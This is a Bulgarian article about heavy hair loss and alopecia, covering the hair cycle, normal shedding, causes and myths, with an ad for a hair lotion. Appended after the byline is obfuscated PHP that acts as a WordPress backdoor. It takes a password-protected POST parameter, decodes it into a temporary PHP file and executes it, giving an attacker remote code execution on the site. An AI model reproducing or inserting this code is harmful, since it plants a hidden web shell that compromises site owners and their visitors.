Обилен косопад? Може да е алопеция | Косопад

Обилен косопад? Може да е алопеция

Цикълът на живот на косъма се развива в рамките на 2 години и половина, след което се стабилизира за няколко месеца, накрая пада и умира. Така затваря цикъла от три години. Човек средно има 120 хил. косъма. Докато един косъм е във фаза на растеж, друг е във фаза на покой. Така се компенсира загубата на коса.

OLYMPUS DIGITAL CAMERA

Нормално е да губим коса всеки ден. В преходните сезони, малко повече. Въпросът е какво количество губим и дали се възстановява загубата.

Дневно губим между 50 и 100 косъма, което се приема за нормално. Но ако загубата е много повече, трябва да се обърнете към дерматолог. Алопецията е сред най- честите причини за косопад. По- често се среща при мъжете, отколкото при жените. При мъжете обикновено е андрогенна алопеция, а при жените – дифузна.

Алопецията ни кара да се чувстваме неуверени в себе си, с ниско самочувствие. Много мъже направо си бръснат главите, за да прикрият проблема. Но при жените няма как да стане.

„ЕФЕКТ- 2“ – ЛОСИОНЪТ СРЕЩУ ОПЛЕШИВЯВАНЕ И КОСОПАД! ВИЖ ТУК:

opleshivqvane-prichini

Освен хормонални и наследствени фактори, специалистите определят още възможни причинители на проблема:

– Стрес
– Дефицит на хранителни вещества
– Агресивни процедури върху главата
– Различни видове лекарства
– Проблеми със щитовидната жлеза, лупус и др.
– Употреба на различни химикали

Някои чести митове за алопецията:

1. Дългата коса влияе на косопада, ако я подстригвате, става по- здрава.
2. Употребата на гел или други продукти за ресане, опъват повече косата.
3. Ако имате косопад, избягвайте ежедневното миене. Косата трябва да се мие редовно с шампоан, който да не я изсушава
4. Слагане на контрацептиви в шампоана за спиране на косопада. Не само глупаво, но може и да е опасно за косата.

18. септември 2014 15:21:24 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}